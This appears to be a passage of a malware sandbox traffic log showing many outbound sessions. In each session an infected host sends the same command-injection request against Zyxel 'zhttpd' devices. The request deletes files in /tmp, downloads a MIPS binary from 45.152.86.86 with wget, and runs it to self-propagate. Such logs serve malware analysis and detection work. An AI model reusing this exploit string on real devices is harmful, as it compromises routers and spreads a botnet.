                                        Mar 31, 2024 09:20:45.425050020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2178192.168.2.2353298187.28.251.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425090075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2179192.168.2.2348350223.93.96.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425143957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2180192.168.2.2346862180.59.237.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425215960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2181192.168.2.233768244.130.95.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425271988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2182192.168.2.2351860152.86.146.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425340891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2183192.168.2.2334168112.237.188.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425407887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2184192.168.2.235395691.54.100.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425462008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2185192.168.2.2349026181.66.186.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425523043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2186192.168.2.234420238.34.186.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425585985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2187192.168.2.233562098.89.60.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425657988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2188192.168.2.2343658122.112.233.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425700903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2189192.168.2.235521878.215.171.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425789118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2190192.168.2.23378404.173.113.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425851107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2191192.168.2.2352924117.157.59.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425945044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2192192.168.2.2350324116.92.107.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.425980091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2193192.168.2.235007078.213.197.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426063061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2194192.168.2.234677445.254.236.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426140070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2195192.168.2.233655612.200.120.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426181078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2196192.168.2.235389850.11.167.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426251888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2197192.168.2.234336259.214.219.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426301003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2198192.168.2.234846858.69.36.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426353931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2199192.168.2.2332930158.149.51.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426388979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2200192.168.2.2356128111.16.161.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426446915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2201192.168.2.2358158162.96.208.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426505089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2202192.168.2.234774040.186.129.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426549911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2203192.168.2.2360900167.81.189.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426641941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2204192.168.2.2360056180.124.43.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426701069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2205192.168.2.2344900106.89.177.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426781893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2206192.168.2.236092460.155.161.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426821947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2207192.168.2.233600658.23.214.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426901102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2208192.168.2.2344096158.186.10.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.426944017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2209192.168.2.2355424202.114.75.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427011967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2210192.168.2.2353742162.209.236.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427068949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2211192.168.2.2344968153.0.3.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427129984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2212192.168.2.235804639.132.19.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427187920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2213192.168.2.23378769.135.99.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427242041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2214192.168.2.23582525.233.253.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427321911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2215192.168.2.2354838207.29.160.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427381992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2216192.168.2.2360560143.101.38.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427452087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2217192.168.2.2342082111.217.70.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427515030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2218192.168.2.2339616194.208.157.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427570105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2219192.168.2.2337080199.100.134.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427659988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2220192.168.2.2342474107.114.52.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427716970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2221192.168.2.2333786151.53.139.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427788973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2222192.168.2.2358924139.78.121.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427834988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2223192.168.2.2358672189.120.157.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427908897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2224192.168.2.2341006120.130.63.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.427968025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2225192.168.2.2347984116.104.28.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428035975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2226192.168.2.2336342184.242.251.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428100109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2227192.168.2.2344062139.60.169.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428158045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2228192.168.2.2352456222.228.160.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428211927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2229192.168.2.2342698105.77.211.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428280115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2230192.168.2.235051824.6.66.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428352118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2231192.168.2.2355560153.180.146.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428404093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2232192.168.2.234805823.247.159.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428463936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2233192.168.2.2342702149.62.81.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428530931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2234192.168.2.233447068.209.224.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428612947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2235192.168.2.2341972169.226.215.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428662062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2236192.168.2.234644699.223.73.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428733110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2237192.168.2.2337368174.254.93.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428777933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2238192.168.2.2333762204.51.250.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428838968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2239192.168.2.235317261.183.22.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.428915024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2240192.168.2.2340532172.124.61.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429003000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2241192.168.2.2335552135.230.249.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429058075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2242192.168.2.2350156161.241.213.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429141998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2243192.168.2.2359066107.99.251.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429219961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2244192.168.2.235159694.95.89.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429280996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2245192.168.2.2347626211.47.13.138443
                                        TimestampBytes transferredDirectionData
